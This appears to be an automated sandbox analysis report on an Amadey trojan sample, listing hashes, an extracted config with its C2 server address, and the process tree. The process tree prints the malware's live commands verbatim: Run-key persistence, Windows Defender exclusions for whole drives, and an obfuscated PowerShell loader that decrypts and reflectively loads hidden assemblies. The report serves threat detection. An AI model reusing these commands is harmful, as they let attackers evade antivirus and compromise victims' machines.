Analysis

  • max time kernel
    1118s
  • max time network
    1165s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231222-en
  • resource tags

    arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    26-01-2024 19:03

General

  • Target

    2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe

  • Size

    4.5MB

  • MD5

    37bb6dd5e4a0d91aef18c328fee94f89

  • SHA1

    72c55abc1527c898153631f1e1233c48440d4ddd

  • SHA256

    9571aa429ecf266de879d8a0e207e4240263e6031adc65293fce003fc8316b57

  • SHA512

    693a47726692bf6853cc1da84bdb9a72c9fba9167c58ad79cf02df67be4993b9575287de5fe0221349e2be39c83d7d1cec00e4bb445a26ddf1726f9da3feb7da

  • SSDEEP

    98304:ZfPdaLQlaZm8vWMTEGky215OS870Bh8/eSKl:ZfP8caA8vWYEGkKS870Bh8/eP

Malware Config

Extracted

Family

amadey

Version

4.15

C2

http://185.172.128.63

Attributes
  • install_dir

    6187fcb526

  • install_file

    Dctooux.exe

  • strings_key

    cd3b2619c9009c441355ae581d53163e

  • url_paths

    /v8sjh3hs8/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe
    "C:\Users\Admin\AppData\Local\Temp\2LRS3ODTLG3KRVJA1CCVAQPPFCFWXJL.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4976
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Visual_background_for_video_chatting';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Visual_background_for_video_chatting' -Value '"C:\Users\Admin\AppData\Local\Visual_background_for_video_chatting\Visual_background_for_video_chatting.exe"' -PropertyType 'String'
      2⤵
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:648
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      2⤵
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1316
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3472
      • C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe
        "C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Launches sc.exe
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2964
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\SysWOW64\cmd.exe
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:3096
          • C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe
            C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe
            5⤵
            • Loads dropped DLL
            • Launches sc.exe
            PID:3756
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3568
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4664
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3344
    • C:\Users\Admin\AppData\Local\Temp\np5vluhs.dos.exe
      "C:\Users\Admin\AppData\Local\Temp\np5vluhs.dos.exe"
      2⤵
      • Executes dropped EXE
      PID:5036
  • C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd';$RfUL='SplstIeistIetstIe'.Replace('stIe', ''),'TrfmgKafmgKnfmgKsfmgKfofmgKrfmgKmFfmgKinafmgKlBfmgKlofmgKckfmgK'.Replace('fmgK', ''),'DecHsSjomHsSjpHsSjrHsSjessHsSj'.Replace('HsSj', ''),'EleBZnKmBZnKeBZnKntBZnKAtBZnK'.Replace('BZnK', ''),'ReGrwradGrwrLiGrwrnGrwreGrwrsGrwr'.Replace('Grwr', ''),'CIOLbopIOLbyIOLbTIOLboIOLb'.Replace('IOLb', ''),'FrpwLNompwLNBapwLNspwLNepwLN6pwLN4SpwLNtpwLNripwLNnpwLNgpwLN'.Replace('pwLN', ''),'LZaAAoZaAAaZaAAdZaAA'.Replace('ZaAA', ''),'IswsYnswsYvokswsYeswsY'.Replace('swsY', ''),'MayHpwinyHpwMoyHpwduyHpwleyHpw'.Replace('yHpw', ''),'EnfcpnnfcptrynfcpPnfcponfcpinnfcptnfcp'.Replace('nfcp', ''),'GKVjZetCKVjZurKVjZrKVjZenKVjZtPrKVjZocKVjZessKVjZ'.Replace('KVjZ', ''),'CmmRYhanmmRYgmmRYeExmmRYtenmmRYsmmRYimmRYonmmRY'.Replace('mmRY', ''),'CrewBkzatwBkzeDwBkzecwBkzrywBkzptwBkzowBkzrwBkz'.Replace('wBkz', '');powershell -w hidden;function HYZRs($YjbML){$FKFbd=[System.Security.Cryptography.Aes]::Create();$FKFbd.Mode=[System.Security.Cryptography.CipherMode]::CBC;$FKFbd.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$FKFbd.Key=[System.Convert]::($RfUL[6])('2M0fT7QfMAGeiJeE2Y8HU5skhkMH0OcAFA0SFzRHVws=');$FKFbd.IV=[System.Convert]::($RfUL[6])('Wv0CCTjoJ02lflet8TKTGg==');$qvWHS=$FKFbd.($RfUL[13])();$UQnTy=$qvWHS.($RfUL[1])($YjbML,0,$YjbML.Length);$qvWHS.Dispose();$FKFbd.Dispose();$UQnTy;}function tsjtk($YjbML){$KLabx=New-Object System.IO.MemoryStream(,$YjbML);$CeqVN=New-Object System.IO.MemoryStream;$OFOrH=New-Object System.IO.Compression.GZipStream($KLabx,[IO.Compression.CompressionMode]::($RfUL[2]));$OFOrH.($RfUL[5])($CeqVN);$OFOrH.Dispose();$KLabx.Dispose();$CeqVN.Dispose();$CeqVN.ToArray();}$xZSiw=[System.IO.File]::($RfUL[4])([Console]::Title);$VwJSg=tsjtk (HYZRs ([Convert]::($RfUL[6])([System.Linq.Enumerable]::($RfUL[3])($xZSiw, 5).Substring(2))));$NGyKN=tsjtk (HYZRs ([Convert]::($RfUL[6])([System.Linq.Enumerable]::($RfUL[3])($xZSiw, 6).Substring(2))));[System.Reflection.Assembly]::($RfUL[7])([byte[]]$NGyKN).($RfUL[10]).($RfUL[8])($null,$null);[System.Reflection.Assembly]::($RfUL[7])([byte[]]$VwJSg).($RfUL[10]).($RfUL[8])($null,$null); "
    1⤵
      PID:1504
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3348

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      61ecf056210295f7de28e195258731b9

      SHA1

      53d2b50327ef84e68b914bc937f50b0e3e6b5895

      SHA256

      9cb8cfca6ac40e91cb8928b58a37868b844c9425644451e5d8a2290b5aa7be8d

      SHA512

      ce30fbc0ab11223cc5aad874c848a57c0d84b108914e178e782e45b2aeb1deb40292d9e43c7839c11cbd18264c4f2451de2edbbef5dd6dc4e1b32a7d787dbf61

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Filesize

      11KB

      MD5

      3c4f254440dbf4e4c52f23b029b12705

      SHA1

      dce0ceb951e426a3013a568aedb8389b7e5a3df3

      SHA256

      fe9828963354f271af8230dcd199f3e7dec6e31defcb7f23a259db65b88377df

      SHA512

      57990b8bff03716868b1bc72ed8f88d51bb70319cd5954aceff355f3c4869b7fb76813b44694588fe9bdb765ad98a2e56770fd4390746f966623b7613a44e6dd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      19KB

      MD5

      3fca153c0da594fbceba5baf4fb721ca

      SHA1

      7e6e15eb472feefc3e1b63d7c9b84a9ef48bde39

      SHA256

      4a3658b2e08db0ae53d2492717f1d36e38cd9bb33ed291f7c2d894f4ca32659e

      SHA512

      c074e6305c48ebcd7ddc61da58c2ce0211adf6498b9bd8f211fa58c8adf3bd0c5a29ee43484cd6cf32906bee57310c612c08680d7feb88d1063d022e92c92688

    • C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd

      Filesize

      60KB

      MD5

      06234cd41d473c454060dc6ba04b4a3d

      SHA1

      f1e76bc9cd069e9427573a6ae0a0125281bfd06a

      SHA256

      db77865d594591c96a547246072bc1dcbefd2dc339cfbed9cf4ead31b9ecae90

      SHA512

      574a4ba38f67dead301aee4841fecdb6e1b9bc2dc330d107f020d9832a3b7ead1f68067c10467233ae440e8595b48b0b4b44f2943f55e4b01ea79a8ff76223c5

    • C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd

      Filesize

      133KB

      MD5

      3bbb11bcc8d74540bf63c242383ca464

      SHA1

      a40ccef129828b3d865eead4810305d1caa323a9

      SHA256

      88da445da2f1f2f4aacd4f796977f1cecf010429742a77f6e79826af7b74b3d2

      SHA512

      1a301f821817fd5534ff95e18474c1d34695af2940c6635293fc6c9f4c5140e42d578d6ed6e4081bda737632236ba09ab8f30256d842b5732dd5aaa4ffdab9ff

    • C:\Users\Admin\AppData\Local\Temp\1001035001\sc.exe

      Filesize

      72KB

      MD5

      80692b28695b8ba8f7e0ab7e9fa22825

      SHA1

      4ac24347a6b6805d88def292a9f54d2d518026db

      SHA256

      35baa0525ae2a70ff054cc5c08b82abbd3babd840ff2b361c519741f0d801468

      SHA512

      2359a4e3cd94baa42f443d8810ad384cb0b1e388272b89cd065a40e85c94c8526409e225c24d1aa213cb660c821015120a04757e9ffbda4e0bf67cd9a5e709b5

    • C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe

      Filesize

      268KB

      MD5

      6044afb657570d95021916c78cbf797a

      SHA1

      9de123b883456ecd41fade26cab6d67a5136074f

      SHA256

      583187401cadd23189809416d38c2c809784c0501b7d572922df3ed0e890d415

      SHA512

      650af4d7fd01529bd99ba946a79ac98e01c9c539ea731e6ae4f598160f0f17758a8c628e4cbd93f6093004b1450d976cc77c78986007185ea6faef2739dd8570

    • C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe

      Filesize

      325KB

      MD5

      2d3193b09f2befea3afa6b94be3c241e

      SHA1

      0b7dcd32f530236d48d0bca32b0bc6a15d205037

      SHA256

      25c01466b8fdc9f198bf72ce66888c455bf5a7990f5e3e1ef74f392e801ee615

      SHA512

      a53b541e7f806bf6101d4edbe8dceea0ac5dfe49599fd5c1ca5acd6d08ab1b3df5cf28564afd1ce717a86d3880533cb9e2758d42ac60d3d47a91c6c16eb0c80b

    • C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe

      Filesize

      271KB

      MD5

      8885a089de7f30da69de8c1ca2d6a3d2

      SHA1

      1be9a2e0f309af45b62b9cace4e8b61cf8f4011d

      SHA256

      387293342886214d98518686e22acacb98a974dcfc5f7ace9e83ea5461ecbaa6

      SHA512

      3be0a9ab2e5cad31cb52e1a59ced4d93a6c3a7574bf88f7efcd9e9eebfa525e799ae973b0a94e2638c6db2719c2e8dbd3e58d5f3b1efa75554bb6834dda29321

    • C:\Users\Admin\AppData\Local\Temp\1001078001\sc.exe

      Filesize

      442KB

      MD5

      eb734538c6d883d4565150c0c422dc94

      SHA1

      20ed3b512cf626d407b5ae7d6b90615572e1ddc8

      SHA256

      eed7a216413648809c972ed026e59579fd916cce6ab3ff72e81a19a7cabf3d56

      SHA512

      c60d89135b0b6da738da0aa9c489f8ebf1844272cc54a2e4a9c0047e3361941cbede5e1bf21e6879bb62c222f1d49588b0f68fe46470faf48204cac733821b60

    • C:\Users\Admin\AppData\Local\Temp\7c317907

      Filesize

      1KB

      MD5

      5663c42997c90888a02deffd2bca6f0e

      SHA1

      13db0840bfcc9120e59ee331a7d191068e46ef44

      SHA256

      9ef6105a965f3ebba7af87ee8047107edef4a274c4ea1c7fab3cecfdfbbe28e3

      SHA512

      f86184129853f11d4a01b7b865a860d7f3bb68bbfedcd0ddaf64dcae6a5a80171dca0d1fafeb1e2c3d9884cf55bf903755199d5fd43b9898566b3d4f0b2ce3b8

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bxfpyqmb.udr.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\np5vluhs.dos.exe

      Filesize

      3KB

      MD5

      bc665c443936ecbaccac579b2e336c09

      SHA1

      0ec27635b26a2a311568824be2bcad09e0ccd027

      SHA256

      1b5b29a86fbab96326253ed97583e699dd7476907418f018486c1abb4ec3aec2

      SHA512

      2fee1859a5457d7d7230762eeb23d27db40223fdf793b09e9e704df34c6e4899b60d592c7026219582cd51c431a424eb040937c0ea033d27d9ecec8a630d336f

    • memory/648-45-0x000000007F870000-0x000000007F880000-memory.dmp

      Filesize

      64KB

    • memory/648-46-0x0000000006DB0000-0x0000000006DE4000-memory.dmp

      Filesize

      208KB

    • memory/648-72-0x00000000742F0000-0x0000000074AA1000-memory.dmp

      Filesize

      7.7MB

    • memory/648-69-0x0000000007F40000-0x0000000007F62000-memory.dmp

      Filesize

      136KB

    • memory/648-28-0x0000000005530000-0x0000000005540000-memory.dmp

      Filesize

      64KB

    • memory/648-30-0x0000000005B70000-0x000000000619A000-memory.dmp

      Filesize

      6.2MB

    • memory/648-31-0x0000000005B30000-0x0000000005B52000-memory.dmp

      Filesize

      136KB

    • memory/648-68-0x0000000007EF0000-0x0000000007EF8000-memory.dmp

      Filesize

      32KB

    • memory/648-42-0x00000000063D0000-0x0000000006727000-memory.dmp

      Filesize

      3.3MB

    • memory/648-33-0x00000000062A0000-0x0000000006306000-memory.dmp

      Filesize

      408KB

    • memory/648-32-0x0000000006230000-0x0000000006296000-memory.dmp

      Filesize

      408KB

    • memory/648-29-0x0000000005530000-0x0000000005540000-memory.dmp

      Filesize

      64KB

    • memory/648-27-0x00000000742F0000-0x0000000074AA1000-memory.dmp

      Filesize

      7.7MB

    • memory/648-66-0x0000000007E00000-0x0000000007E15000-memory.dmp

      Filesize

      84KB

    • memory/648-25-0x0000000002FF0000-0x0000000003026000-memory.dmp

      Filesize

      216KB

    • memory/648-44-0x0000000006810000-0x000000000685C000-memory.dmp

      Filesize

      304KB

    • memory/648-43-0x00000000067D0000-0x00000000067EE000-memory.dmp

      Filesize

      120KB

    • memory/648-67-0x0000000007F00000-0x0000000007F1A000-memory.dmp

      Filesize

      104KB

    • memory/648-65-0x0000000007DF0000-0x0000000007DFE000-memory.dmp

      Filesize

      56KB

    • memory/648-64-0x0000000007DC0000-0x0000000007DD1000-memory.dmp

      Filesize

      68KB

    • memory/648-63-0x0000000007E40000-0x0000000007ED6000-memory.dmp

      Filesize

      600KB

    • memory/648-47-0x000000006FA90000-0x000000006FADC000-memory.dmp

      Filesize

      304KB

    • memory/648-56-0x00000000077C0000-0x00000000077DE000-memory.dmp

      Filesize

      120KB

    • memory/648-57-0x0000000005530000-0x0000000005540000-memory.dmp

      Filesize

      64KB

    • memory/648-59-0x00000000079F0000-0x0000000007A94000-memory.dmp

      Filesize

      656KB

    • memory/648-58-0x0000000005530000-0x0000000005540000-memory.dmp

      Filesize

      64KB

    • memory/648-61-0x0000000007BB0000-0x0000000007BCA000-memory.dmp

      Filesize

      104KB

    • memory/648-60-0x00000000081F0000-0x000000000886A000-memory.dmp

      Filesize

      6.5MB

    • memory/648-62-0x0000000007C30000-0x0000000007C3A000-memory.dmp

      Filesize

      40KB

    • memory/1316-22-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/1316-19-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/1316-125-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/1316-134-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/1316-142-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/1316-17-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/1316-18-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/1316-85-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/1316-82-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/1316-173-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/1316-164-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/1316-20-0x0000000000400000-0x000000000046D000-memory.dmp

      Filesize

      436KB

    • memory/2964-212-0x00007FFF05C60000-0x00007FFF05DDA000-memory.dmp

      Filesize

      1.5MB

    • memory/2964-187-0x00007FFF05C60000-0x00007FFF05DDA000-memory.dmp

      Filesize

      1.5MB

    • memory/2964-176-0x00007FF7CE160000-0x00007FF7CE2BF000-memory.dmp

      Filesize

      1.4MB

    • memory/3096-216-0x00000000741C0000-0x000000007433D000-memory.dmp

      Filesize

      1.5MB

    • memory/3096-215-0x00007FFF26200000-0x00007FFF26409000-memory.dmp

      Filesize

      2.0MB

    • memory/3344-143-0x0000000073A60000-0x0000000074211000-memory.dmp

      Filesize

      7.7MB

    • memory/3568-139-0x0000000076EE1000-0x0000000077003000-memory.dmp

      Filesize

      1.1MB

    • memory/3568-137-0x0000000007AF0000-0x0000000007AFA000-memory.dmp

      Filesize

      40KB

    • memory/3568-100-0x0000000006C80000-0x0000000006CCC000-memory.dmp

      Filesize

      304KB

    • memory/3568-101-0x00000000078D0000-0x0000000007916000-memory.dmp

      Filesize

      280KB

    • memory/3568-88-0x0000000073A60000-0x0000000074211000-memory.dmp

      Filesize

      7.7MB

    • memory/3568-93-0x00000000061A0000-0x00000000064F7000-memory.dmp

      Filesize

      3.3MB

    • memory/3568-140-0x0000000007DA0000-0x0000000007DCE000-memory.dmp

      Filesize

      184KB

    • memory/3568-141-0x00000000756C0000-0x00000000757B0000-memory.dmp

      Filesize

      960KB

    • memory/3568-89-0x0000000005250000-0x0000000005260000-memory.dmp

      Filesize

      64KB

    • memory/3568-90-0x0000000005250000-0x0000000005260000-memory.dmp

      Filesize

      64KB

    • memory/3756-221-0x00007FF709910000-0x00007FF70996A000-memory.dmp

      Filesize

      360KB

    • memory/3756-223-0x00007FF709910000-0x00007FF70996A000-memory.dmp

      Filesize

      360KB

    • memory/4664-136-0x0000000073A60000-0x0000000074211000-memory.dmp

      Filesize

      7.7MB

    • memory/4664-104-0x0000000073A60000-0x0000000074211000-memory.dmp

      Filesize

      7.7MB

    • memory/4664-105-0x0000000002D80000-0x0000000002D90000-memory.dmp

      Filesize

      64KB

    • memory/4976-4-0x00000000055B0000-0x00000000055C0000-memory.dmp

      Filesize

      64KB

    • memory/4976-0-0x00000000742F0000-0x0000000074AA1000-memory.dmp

      Filesize

      7.7MB

    • memory/4976-6-0x0000000006C10000-0x0000000006DA2000-memory.dmp

      Filesize

      1.6MB

    • memory/4976-2-0x00000000054F0000-0x000000000558C000-memory.dmp

      Filesize

      624KB

    • memory/4976-10-0x00000000055B0000-0x00000000055C0000-memory.dmp

      Filesize

      64KB

    • memory/4976-7-0x0000000006DC0000-0x0000000006DD0000-memory.dmp

      Filesize

      64KB

    • memory/4976-8-0x00000000055B0000-0x00000000055C0000-memory.dmp

      Filesize

      64KB

    • memory/4976-1-0x0000000000560000-0x00000000009E2000-memory.dmp

      Filesize

      4.5MB

    • memory/4976-9-0x00000000055B0000-0x00000000055C0000-memory.dmp

      Filesize

      64KB

    • memory/4976-15-0x0000000006F90000-0x0000000007090000-memory.dmp

      Filesize

      1024KB

    • memory/4976-11-0x00000000055B0000-0x00000000055C0000-memory.dmp

      Filesize

      64KB

    • memory/4976-12-0x00000000055B0000-0x00000000055C0000-memory.dmp

      Filesize

      64KB

    • memory/4976-14-0x0000000006F90000-0x0000000007090000-memory.dmp

      Filesize

      1024KB

    • memory/4976-26-0x00000000742F0000-0x0000000074AA1000-memory.dmp

      Filesize

      7.7MB

    • memory/4976-13-0x00000000055B0000-0x00000000055C0000-memory.dmp

      Filesize

      64KB

    • memory/4976-16-0x0000000006F90000-0x0000000007090000-memory.dmp

      Filesize

      1024KB

    • memory/4976-21-0x0000000007780000-0x0000000007D26000-memory.dmp

      Filesize

      5.6MB

    • memory/4976-3-0x00000000742F0000-0x0000000074AA1000-memory.dmp

      Filesize

      7.7MB

    • memory/4976-5-0x00000000058C0000-0x0000000005AD6000-memory.dmp

      Filesize

      2.1MB